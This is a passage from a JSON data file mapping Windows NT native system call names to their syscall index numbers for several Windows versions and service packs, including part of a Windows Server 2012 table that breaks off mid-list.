"NtQuerySecurityObject": "295", "NtQuerySemaphore": "296", "NtQuerySymbolicLinkObject": "297", "NtQuerySystemEnvironmentValue": "298", "NtQuerySystemEnvironmentValueEx": "299", "NtQuerySystemInformationEx": "300", "NtQueryTimerResolution": "301", "NtQueueApcThreadEx": "302", "NtRaiseException": "303", "NtRaiseHardError": "304", "NtReadOnlyEnlistment": "305", "NtRecoverEnlistment": "306", "NtRecoverResourceManager": "307", "NtRecoverTransactionManager": "308", "NtRegisterProtocolAddressInformation": "309", "NtRegisterThreadTerminatePort": "310", "NtReleaseKeyedEvent": "311", "NtReleaseWorkerFactoryWorker": "312", "NtRemoveIoCompletionEx": "313", "NtRemoveProcessDebug": "314", "NtRenameKey": "315", "NtRenameTransactionManager": "316", "NtReplaceKey": "317", "NtReplacePartitionUnit": "318", "NtReplyWaitReplyPort": "319", "NtRequestPort": "320", "NtResetEvent": "321", "NtResetWriteWatch": "322", "NtRestoreKey": "323", "NtResumeProcess": "324", "NtRollbackComplete": "325", "NtRollbackEnlistment": "326", "NtRollbackTransaction": "327", "NtRollforwardTransactionManager": "328", "NtSaveKey": "329", "NtSaveKeyEx": "330", "NtSaveMergedKeys": "331", "NtSecureConnectPort": "332", "NtSerializeBoot": "333", "NtSetBootEntryOrder": "334", "NtSetBootOptions": "335", "NtSetContextThread": "336", "NtSetDebugFilterState": "337", "NtSetDefaultHardErrorPort": "338", "NtSetDefaultLocale": "339", "NtSetDefaultUILanguage": "340", "NtSetDriverEntryOrder": "341", "NtSetEaFile": "342", "NtSetHighEventPair": "343", "NtSetHighWaitLowEventPair": "344", "NtSetInformationDebugObject": "345", "NtSetInformationEnlistment": "346", "NtSetInformationJobObject": "347", "NtSetInformationKey": "348", "NtSetInformationResourceManager": "349", "NtSetInformationToken": "350", "NtSetInformationTransaction": "351", "NtSetInformationTransactionManager": "352", "NtSetInformationWorkerFactory": "353", "NtSetIntervalProfile": "354", "NtSetIoCompletion": "355", "NtSetIoCompletionEx": "356", "NtSetLdtEntries": "357", "NtSetLowEventPair": "358", "NtSetLowWaitHighEventPair": "359", "NtSetQuotaInformationFile": "360", "NtSetSecurityObject": "361", "NtSetSystemEnvironmentValue": "362", "NtSetSystemEnvironmentValueEx": "363", "NtSetSystemInformation": "364", "NtSetSystemPowerState": "365", "NtSetSystemTime": "366", "NtSetThreadExecutionState": "367", "NtSetTimerEx": "368", "NtSetTimerResolution": "369", "NtSetUuidSeed": "370", "NtSetVolumeInformationFile": "371", "NtShutdownSystem": "372", "NtShutdownWorkerFactory": "373", "NtSignalAndWaitForSingleObject": "374", "NtSinglePhaseReject": "375", "NtStartProfile": "376", "NtStopProfile": "377", "NtSuspendProcess": "378", "NtSuspendThread": "379", "NtSystemDebugControl": "380", "NtTerminateJobObject": "381", "NtTestAlert": "382", "NtThawRegistry": "383", "NtThawTransactions": "384", "NtTraceControl": "385", "NtTranslateFilePath": "386", "NtUmsThreadYield": "387", "NtUnloadDriver": "388", "NtUnloadKey": "389", "NtUnloadKey2": "390", "NtUnloadKeyEx": "391", "NtUnlockFile": "392", "NtUnlockVirtualMemory": "393", "NtVdmControl": "394", "NtWaitForDebugEvent": "395", "NtWaitForKeyedEvent": "396", "NtWaitForWorkViaWorkerFactory": "397", "NtWaitHighEventPair": "398", "NtWaitLowEventPair": "399", "NtWorkerFactoryWorkerReady": "400"}, "SP1": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateReserveObject": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelIoFileEx": "134", "NtCancelSynchronousIoFile": "135", "NtCommitComplete": "136", "NtCommitEnlistment": "137", "NtCommitTransaction": "138", "NtCompactKeys": "139", "NtCompareTokens": "140", "NtCompleteConnectPort": "141", "NtCompressKey": "142", "NtConnectPort": "143", "NtCreateDebugObject": "144", "NtCreateDirectoryObject": "145", "NtCreateEnlistment": "146", "NtCreateEventPair": "147", "NtCreateIoCompletion": "148", "NtCreateJobObject": "149", "NtCreateJobSet": "150", "NtCreateKeyTransacted": "151", "NtCreateKeyedEvent": "152", "NtCreateMailslotFile": "153", "NtCreateMutant": "154", "NtCreateNamedPipeFile": "155", "NtCreatePagingFile": "156", "NtCreatePort": "157", "NtCreatePrivateNamespace": "158", "NtCreateProcess": "159", "NtCreateProfile": "160", "NtCreateProfileEx": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisableLastKnownGood": "183", "NtDisplayString": "184", "NtDrawText": "185", "NtEnableLastKnownGood": "186", "NtEnumerateBootEntries": "187", "NtEnumerateDriverEntries": "188", "NtEnumerateSystemEnvironmentValuesEx": "189", "NtEnumerateTransactionObject": "190", "NtExtendSection": "191", "NtFilterToken": "192", "NtFlushInstallUILanguage": "193", "NtFlushInstructionCache": "194", "NtFlushKey": "195", "NtFlushProcessWriteBuffers": "196", "NtFlushVirtualMemory": "197", "NtFlushWriteBuffer": "198", "NtFreeUserPhysicalPages": "199", "NtFreezeRegistry": "200", "NtFreezeTransactions": "201", "NtGetContextThread": "202", "NtGetCurrentProcessorNumber": "203", "NtGetDevicePowerState": "204", "NtGetMUIRegistryInfo": "205", "NtGetNextProcess": "206", "NtGetNextThread": "207", "NtGetNlsSectionPtr": "208", "NtGetNotificationResourceManager": "209", "NtGetPlugPlayEvent": "210", "NtGetWriteWatch": "211", "NtImpersonateAnonymousToken": "212", "NtImpersonateThread": "213", "NtInitializeNlsFiles": "214", "NtInitializeRegistry": "215", "NtInitiatePowerAction": "216", "NtIsSystemResumeAutomatic": "217", "NtIsUILanguageComitted": "218", "NtListenPort": "219", "NtLoadDriver": "220", "NtLoadKey": "221", "NtLoadKey2": "222", "NtLoadKeyEx": "223", "NtLockFile": "224", "NtLockProductActivationKeys": "225", "NtLockRegistryKey": "226", "NtLockVirtualMemory": "227", "NtMakePermanentObject": "228", "NtMakeTemporaryObject": "229", "NtMapCMFModule": "230", "NtMapUserPhysicalPages": "231", "NtModifyBootEntry": "232", "NtModifyDriverEntry": "233", "NtNotifyChangeDirectoryFile": "234", "NtNotifyChangeKey": "235", "NtNotifyChangeMultipleKeys": "236", "NtNotifyChangeSession": "237", "NtOpenEnlistment": "238", "NtOpenEventPair": "239", "NtOpenIoCompletion": "240", "NtOpenJobObject": "241", "NtOpenKeyEx": "242", "NtOpenKeyTransacted": "243", "NtOpenKeyTransactedEx": "244", "NtOpenKeyedEvent": "245", "NtOpenMutant": "246", "NtOpenObjectAuditAlarm": "247", "NtOpenPrivateNamespace": "248", "NtOpenProcessToken": "249", "NtOpenResourceManager": "250", "NtOpenSemaphore": "251", "NtOpenSession": "252", "NtOpenSymbolicLinkObject": "253", "NtOpenThread": "254", "NtOpenTimer": "255", "NtOpenTransaction": "256", "NtOpenTransactionManager": "257", "NtPlugPlayControl": "258", "NtPrePrepareComplete": "259", "NtPrePrepareEnlistment": "260", "NtPrepareComplete": "261", "NtPrepareEnlistment": "262", "NtPrivilegeCheck": "263", "NtPrivilegeObjectAuditAlarm": "264", "NtPrivilegedServiceAuditAlarm": "265", "NtPropagationComplete": "266", "NtPropagationFailed": "267", "NtPulseEvent": "268", "NtQueryBootEntryOrder": "269", "NtQueryBootOptions": "270", "NtQueryDebugFilterState": "271", "NtQueryDirectoryObject": "272", "NtQueryDriverEntryOrder": "273", "NtQueryEaFile": "274", "NtQueryFullAttributesFile": "275", "NtQueryInformationAtom": "276", "NtQueryInformationEnlistment": "277", "NtQueryInformationJobObject": "278", "NtQueryInformationPort": "279", "NtQueryInformationResourceManager": "280", "NtQueryInformationTransaction": "281", "NtQueryInformationTransactionManager": "282", "NtQueryInformationWorkerFactory": "283", "NtQueryInstallUILanguage": "284", "NtQueryIntervalProfile": "285", "NtQueryIoCompletion": "286", "NtQueryLicenseValue": "287", "NtQueryMultipleValueKey": "288", "NtQueryMutant": "289", "NtQueryOpenSubKeys": "290", "NtQueryOpenSubKeysEx": "291", "NtQueryPortInformationProcess": "292", "NtQueryQuotaInformationFile": "293", "NtQuerySecurityAttributesToken": "294", "NtQuerySecurityObject": "295", "NtQuerySemaphore": "296", "NtQuerySymbolicLinkObject": "297", "NtQuerySystemEnvironmentValue": "298", "NtQuerySystemEnvironmentValueEx": "299", "NtQuerySystemInformationEx": "300", "NtQueryTimerResolution": "301", "NtQueueApcThreadEx": "302", "NtRaiseException": "303", "NtRaiseHardError": "304", "NtReadOnlyEnlistment": "305", "NtRecoverEnlistment": "306", "NtRecoverResourceManager": "307", "NtRecoverTransactionManager": "308", "NtRegisterProtocolAddressInformation": "309", "NtRegisterThreadTerminatePort": "310", "NtReleaseKeyedEvent": "311", "NtReleaseWorkerFactoryWorker": "312", "NtRemoveIoCompletionEx": "313", "NtRemoveProcessDebug": "314", "NtRenameKey": "315", "NtRenameTransactionManager": "316", "NtReplaceKey": "317", "NtReplacePartitionUnit": "318", "NtReplyWaitReplyPort": "319", "NtRequestPort": "320", "NtResetEvent": "321", "NtResetWriteWatch": "322", "NtRestoreKey": "323", "NtResumeProcess": "324", "NtRollbackComplete": "325", "NtRollbackEnlistment": "326", "NtRollbackTransaction": "327", "NtRollforwardTransactionManager": "328", "NtSaveKey": "329", "NtSaveKeyEx": "330", "NtSaveMergedKeys": "331", "NtSecureConnectPort": "332", "NtSerializeBoot": "333", "NtSetBootEntryOrder": "334", "NtSetBootOptions": "335", "NtSetContextThread": "336", "NtSetDebugFilterState": "337", "NtSetDefaultHardErrorPort": "338", "NtSetDefaultLocale": "339", "NtSetDefaultUILanguage": "340", "NtSetDriverEntryOrder": "341", "NtSetEaFile": "342", "NtSetHighEventPair": "343", "NtSetHighWaitLowEventPair": "344", "NtSetInformationDebugObject": "345", "NtSetInformationEnlistment": "346", "NtSetInformationJobObject": "347", "NtSetInformationKey": "348", "NtSetInformationResourceManager": "349", "NtSetInformationToken": "350", "NtSetInformationTransaction": "351", "NtSetInformationTransactionManager": "352", "NtSetInformationWorkerFactory": "353", "NtSetIntervalProfile": "354", "NtSetIoCompletion": "355", "NtSetIoCompletionEx": "356", "NtSetLdtEntries": "357", "NtSetLowEventPair": "358", "NtSetLowWaitHighEventPair": "359", "NtSetQuotaInformationFile": "360", "NtSetSecurityObject": "361", "NtSetSystemEnvironmentValue": "362", "NtSetSystemEnvironmentValueEx": "363", "NtSetSystemInformation": "364", "NtSetSystemPowerState": "365", "NtSetSystemTime": "366", "NtSetThreadExecutionState": "367", "NtSetTimerEx": "368", "NtSetTimerResolution": "369", "NtSetUuidSeed": "370", "NtSetVolumeInformationFile": "371", "NtShutdownSystem": "372", "NtShutdownWorkerFactory": "373", "NtSignalAndWaitForSingleObject": "374", "NtSinglePhaseReject": "375", "NtStartProfile": "376", "NtStopProfile": "377", "NtSuspendProcess": "378", "NtSuspendThread": "379", "NtSystemDebugControl": "380", "NtTerminateJobObject": "381", "NtTestAlert": "382", "NtThawRegistry": "383", "NtThawTransactions": "384", "NtTraceControl": "385", "NtTranslateFilePath": "386", "NtUmsThreadYield": "387", "NtUnloadDriver": "388", "NtUnloadKey": "389", "NtUnloadKey2": "390", "NtUnloadKeyEx": "391", "NtUnlockFile": "392", "NtUnlockVirtualMemory": "393", "NtVdmControl": "394", "NtWaitForDebugEvent": "395", "NtWaitForKeyedEvent": "396", "NtWaitForWorkViaWorkerFactory": "397", "NtWaitHighEventPair": "398", "NtWaitLowEventPair": "399", "NtWorkerFactoryWorkerReady": "400"}}, "Windows Server 2012": {"SP0": {"NtWorkerFactoryWorkerReady": "0", "NtMapUserPhysicalPagesScatter": "1", "NtWaitForSingleObject": "2", "NtCallbackReturn": "3", "NtReadFile": "4", "NtDeviceIoControlFile": "5", "NtWriteFile": "6", "NtRemoveIoCompletion": "7", "NtReleaseSemaphore": "8", "NtReplyWaitReceivePort": "9", "NtReplyPort": "10", "NtSetInformationThread": "11", "NtSetEvent": "12", "NtClose": "13", "NtQueryObject": "14", "NtQueryInformationFile": "15", "NtOpenKey": "16", "NtEnumerateValueKey": "17", "NtFindAtom": "18", "NtQueryDefaultLocale": "19", "NtQueryKey": "20", "NtQueryValueKey": "21", "NtAllocateVirtualMemory": "22", "NtQueryInformationProcess": "23", "NtWaitForMultipleObjects32": "24", "NtWriteFileGather": "25", "NtSetInformationProcess": "26", "NtCreateKey": "27", "NtFreeVirtualMemory": "28", "NtImpersonateClientOfPort": "29", "NtReleaseMutant": "30", "NtQueryInformationToken": "31", "NtRequestWaitReplyPort": "32", "NtQueryVirtualMemory": "33", "NtOpenThreadToken": "34", "NtQueryInformationThread": "35", "NtOpenProcess": "36", "NtSetInformationFile": "37", "NtMapViewOfSection": "38", "NtAccessCheckAndAuditAlarm": "39", "NtUnmapViewOfSection": "40", "NtReplyWaitReceivePortEx": "41", "NtTerminateProcess": "42", "NtSetEventBoostPriority": "43", "NtReadFileScatter": "44", "NtOpenThreadTokenEx": "45", "NtOpenProcessTokenEx": "46", "NtQueryPerformanceCounter": "47", "NtEnumerateKey": "48", "NtOpenFile": "49", "NtDelayExecution": "50", "NtQueryDirectoryFile": "51", "NtQuerySystemInformation": "52", "NtOpenSection": "53", "NtQueryTimer": "54", "NtFsControlFile": "55", "NtWriteVirtualMemory": "56", "NtCloseObjectAuditAlarm": "57", "NtDuplicateObject": "58", "NtQueryAttributesFile": "59", "NtClearEvent": "60", "NtReadVirtualMemory": "61", "NtOpenEvent": "62", "NtAdjustPrivilegesToken": "63", "NtDuplicateToken": "64", "NtContinue": "65", "NtQueryDefaultUILanguage": "66", "NtQueueApcThread": "67", "NtYieldExecution": "68", "NtAddAtom": "69", "NtCreateEvent": "70", "NtQueryVolumeInformationFile": "71", "NtCreateSection": "72", "NtFlushBuffersFile": "73", "NtApphelpCacheControl": "74", "NtCreateProcessEx": "75", "NtCreateThread": "76", "NtIsProcessInJob": "77", "NtProtectVirtualMemory": "78", "NtQuerySection": "79", "NtResumeThread": "80", "NtTerminateThread": "81", "NtReadRequestData": "82", "NtCreateFile": "83", "NtQueryEvent": "84", "NtWriteRequestData": "85", "NtOpenDirectoryObject": "86", "NtAccessCheckByTypeAndAuditAlarm": "87", "NtQuerySystemTime": "88", "NtWaitForMultipleObjects": "89", "NtSetInformationObject": "90", "NtCancelIoFile": "91", "NtTraceEvent": "92", "NtPowerInformation": "93", "NtSetValueKey": "94", "NtCancelTimer": "95", "NtSetTimer": "96", "NtAcceptConnectPort": "97", "NtAccessCheck": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientOfPort": "129", "NtAlpcOpenSenderProcess": "130", "NtAlpcOpenSenderThread": "131", "NtAlpcQueryInformation": "132", "NtAlpcQueryInformationMessage": "133", "NtAlpcRevokeSecurityContext": "134", "NtAlpcSendWaitReceivePort": "135", "NtAlpcSetInformation": "136", "NtAreMappedFilesTheSame": "137", "NtAssignProcessToJobObject": "138", "NtAssociateWaitCompletionPacket": "139", "NtCancelIoFileEx": "140", "NtCancelSynchronousIoFile": "141", "NtCancelWaitCompletionPacket": "142", "NtCommitComplete": "143", "NtCommitEnlistment": "144", "NtCommitTransaction": "145", "NtCompactKeys": "146", "NtCompareTokens": "147", "NtCompleteConnectPort": "148", "NtCompressKey": "149", "NtConnectPort": "150", "NtCreateDebugObject": "151", "NtCreateDirectoryObject": "152", "NtCreateDirectoryObjectEx": "153", "NtCreateEnlistment": "154", "NtCreateEventPair": "155", "NtCreateIRTimer": "156", "NtCreateIoCompletion": "157", "NtCreateJobObject": "158", "NtCreateJobSet": "159", "NtCreateKeyTransacted": "160", "NtCreateKeyedEvent": "161", "NtCreateLowBoxToken": "162", "NtCreateMailslotFile": "163", "NtCreateMutant": "164", "NtCreateNamedPipeFile": "165", "NtCreatePagingFile": "166", "NtCreatePort": "167", "NtCreatePrivateNamespace": "168", "NtCreateProcess": "169", "NtCreateProfile": "170", "NtCreateProfileEx": "171", "NtCreateResourceManager": "172", "NtCreateSemaphore": "173", "NtCreateSymbolicLinkObject": "174", "NtCreateThreadEx": "175", "NtCreateTimer": "176", "NtCreateToken": "177", "NtCreateTokenEx": "178", "NtCreateTransaction": "179", "NtCreateTransactionManager": "180", "NtCreateUserProcess": "181", "NtCreateWaitCompletionPacket": "182", "NtCreateWaitablePort": "183", "NtCreateWnfStateName": "184", "NtCreateWorkerFactory": "185", "NtDebugActiveProcess": "186", "NtDebugContinue": "187", "NtDeleteAtom": "188", "NtDeleteBootEntry": "189", "NtDeleteDriverEntry": "190", "NtDeleteFile": "191", "NtDeleteKey": "192", "NtDeleteObjectAuditAlarm": "193", "NtDeletePrivateNamespace": "194", "NtDeleteValueKey": "195", "NtDeleteWnfStateData": "196", "NtDeleteWnfStateName": "197", "NtDisableLastKnownGood": "198", "NtDisplayString": "199", "NtDrawText": "200", "NtEnableLastKnownGood": "201", "NtEnumerateBootEntries": "202", "NtEnumerateDriverEntries": "203", "NtEnumerateSystemEnvironmentValuesEx": "204", "NtEnumerateTransactionObject": "205", "NtExtendSection": "206", "NtFilterBootOption": "207", "NtFilterToken": "208", "NtFilterTokenEx": "209", "NtFlushBuffersFileEx": "210", "NtFlushInstallUILanguage": "211", "NtFlushInstructionCache": "212", "NtFlushKey": "213", "NtFlushProcessWriteBuffers": "214", "NtFlushVirtualMemory": "215", "NtFlushWriteBuffer": "216", "NtFreeUserPhysicalPages": "217", "NtFreezeRegistry": "218", "NtFreezeTransactions": "219", "NtGetCachedSigningLevel": "220", "NtGetContextThread": "221", "NtGetCurrentProcessorNumber": "222", "NtGetDevicePowerState": "223", "NtGetMUIRegistryInfo": "224", "NtGetNextProcess": "225", "NtGetNextThread": "226", "NtGetNlsSectionPtr": "227", "NtGetNotificationResourceManager": "228", "NtGetWriteWatch": "229", "NtImpersonateAnonymousToken": "230", "NtImpersonateThread": "231", "NtInitializeNlsFiles": "232", "NtInitializeRegistry": "233", "NtInitiatePowerAction": "234", "NtIsSystemResumeAutomatic": "235", "NtIsUILanguageComitted": "236", "NtListenPort": "237", "NtLoadDriver": "238", "NtLoadKey": "239", "NtLoadKey2": "240", "NtLoadKeyEx": "241", "NtLockFile": "242", "NtLockProductActivationKeys": "243", "NtLockRegistryKey": "244", "NtLockVirtualMemory": "245", "NtMakePermanentObject": "246", "NtMakeTemporaryObject": "247", "NtMapCMFModule": "248", "NtMapUserPhysicalPages": "249", "NtModifyBootEntry": "250", "NtModifyDriverEntry": "251", "NtNotifyChangeDirectoryFile": "252", "NtNotifyChangeKey": "253", "NtNotifyChangeMultipleKeys": "254", "NtNotifyChangeSession": "255", "NtOpenEnlistment": "256", "NtOpenEventPair": "257", "NtOpenIoCompletion": "258", "NtOpenJobObject": "259", "NtOpenKeyEx": "260", "NtOpenKeyTransacted": "261", "NtOpenKeyTransactedEx": "262", "NtOpenKeyedEvent": "263", "NtOpenMutant": "264", "NtOpenObjectAuditAlarm": "265", "NtOpenPrivateNamespace": "266", "NtOpenProcessToken": "267", "NtOpenResourceManager": "268", "NtOpenSemaphore": "269", "NtOpenSession": "270", "NtOpenSymbolicLinkObject": "271", "NtOpenThread": "272", "NtOpenTimer": "273", "NtOpenTransaction": "274", "NtOpenTransactionManager": "275", "NtPlugPlayControl": "276", "NtPrePrepareComplete": "277", "NtPrePrepareEnlistment": "278", "NtPrepareComplete": "279", "NtPrepareEnlistment": "280", "NtPrivilegeCheck": "281", "NtPrivilegeObjectAuditAlarm": "282", "NtPrivilegedServiceAuditAlarm": "283", "NtPropagationComplete": "284", "NtPropagationFailed": "285", "NtPulseEvent": "286", "NtQueryBootEntryOrder": "287", "NtQueryBootOptions": "288", "NtQueryDebugFilterState": "289", "NtQueryDirectoryObject": "290", "NtQueryDriverEntryOrder": "291", "NtQueryEaFile": "292", "NtQueryFullAttributesFile": "293", "NtQueryInformationAtom": "294", "NtQueryInformationEnlistment": "295", "NtQueryInformationJobObject": "296", "NtQueryInformationPort": "297", "NtQueryInformationResourceManager": "298", "NtQueryInformationTransaction": "299", "NtQueryInformationTransactionManager": "300", "NtQueryInformationWorkerFactory": "301", "NtQueryInstallUILanguage": "302", "NtQueryIntervalProfile": "303", "NtQueryIoCompletion": "304", "NtQueryLicenseValue": "305", "NtQueryMultipleValueKey": "306", "NtQueryMutant": "307", "NtQueryOpenSubKeys": "308", "NtQueryOpenSubKeysEx": "309", "NtQueryPortInformationProcess": "310", "NtQueryQuotaInformationFile": "311", "NtQuerySecurityAttributesToken": "312", "NtQuerySecurityObject": "313", "NtQuerySemaphore": "314", "NtQuerySymbolicLinkObject": "315", "NtQuerySystemEnvironmentValue": "316", "NtQuerySystemEnvironmentValueEx": "317", "NtQuerySystemInformationEx": "318", "NtQueryTimerResolution": "319", "NtQueryWnfStateData": "320", "NtQueryWnfStateNameInformation": "321", "NtQueueApcThreadEx": "322", "NtRaiseException": "323", "NtRaiseHardError": "324", "NtReadOnlyEnlistment": "325", "NtRecoverEnlistment": "326", "NtRecoverResourceManager": "327", "NtRecoverTransactionManager": "328", "NtRegisterProtocolAddressInformation": "329", "NtRegisterThreadTerminatePort": "330", "NtReleaseKeyedEvent": "331", "NtReleaseWorkerFactoryWorker": "332", "NtRemoveIoCompletionEx": "333", "NtRemoveProcessDebug": "334", "NtRenameKey": "335", "NtRenameTransactionManager": "336", "NtReplaceKey": "337", "NtReplacePartitionUnit": "338", "NtReplyWaitReplyPort": "339", "NtRequestPort": "340", "NtResetEvent": "341", "NtResetWriteWatch": "342", "NtRestoreKey": "343", "NtResumeProcess": "344", "NtRollbackComplete": "345", "NtRollbackEnlistment": "346", "NtRollbackTransaction": "347", "NtRollforwardTransactionManager": "348", "NtSaveKey": "349", "NtSaveKeyEx": "350", "NtSaveMergedKeys": "351", "NtSecureConnectPort": "352", "NtSerializeBoot": "353", "NtSetBootEntryOrder": "354", "NtSetBootOptions": "355", "NtSetCachedSigningLevel": "356", "NtSetContextThread": "357", "NtSetDebugFilterState": "358", "NtSetDefaultHardErrorPort": "359", "NtSetDefaultLocale": "360", "NtSetDefaultUILanguage": "361", "NtSetDriverEntryOrder": "362", "NtSetEaFile": "363", "NtSetHighEventPair": "364", "NtSetHighWaitLowEventPair": "365", "NtSetIRTimer": "366", "NtSetInformationDebugObject": "367", "NtSetInformationEnlistment": "368", "NtSetInformationJobObject": "369", "NtSetInformationKey": "370", "NtSetInformationResourceManager": "371", "NtSetInformationToken": "372", "NtSetInformationTransaction": "373", "NtSetInformationTransactionManager": "374", "NtSetInformationVirtualMemory": "375", "NtSetInformationWorkerFactory": "376", "NtSetIntervalProfile": "377", "NtSetIoCompletion": "378", "NtSetIoCompletionEx": "379", "NtSetLdtEntries": "380", "NtSetLowEventPair": "381", "NtSetLowWaitHighEventPair": "382", "NtSetQuotaInformationFile": "383", "NtSetSecurityObject": "384", "NtSetSystemEnvironmentValue": "385", "NtSetSystemEnvironmentValueEx": "386", "NtSetSystemInformation": "387", "NtSetSystemPowerState": "388", "NtSetSystemTime": "389", "NtSetThreadExecutionState": "390", "NtSetTimerEx": "391", "NtSetTimerResolution": "392", "NtSetUuidSeed": "393", "NtSetVolumeInformationFile": "394", "NtShutdownSystem": "395", "NtShutdownWorkerFactory": "396", "NtSignalAndWaitForSingleObject": "397", "NtSinglePhaseReject": "398", "NtStartProfile": "399", "NtStopProfile": "400", "NtSubscribeWnfStateChange": "401", "NtSuspendProcess": "402", "NtSuspendThread": "403", "NtSystemDebugControl": "404", "NtTerminateJobObject": "405", "NtTestAlert": "406", "NtThawRegistry": "407", "NtThawTransactions": "408", "NtTraceControl": "409", "NtTranslateFilePath": "410", "NtUmsThreadYield": "411", "NtUnloadDriver": "412", "NtUnloadKey": "413", "NtUnloadKey2": "414", "NtUnloadKeyEx": "415", "NtUnlockFile": "416", "NtUnlockVirtualMemory": "417", "NtUnmapViewOfSectionEx": "418", "NtUnsubscribeWnfStateChange": "419", "NtUpdateWnfStateData": "420", "NtVdmControl": "421", "NtWaitForAlertByThreadId": "422", "NtWaitForDebugEvent": "423", "NtWaitForKeyedEvent": "424", "NtWaitForWnfNotifications": "425", "NtWaitForWorkViaWorkerFactory": "426", 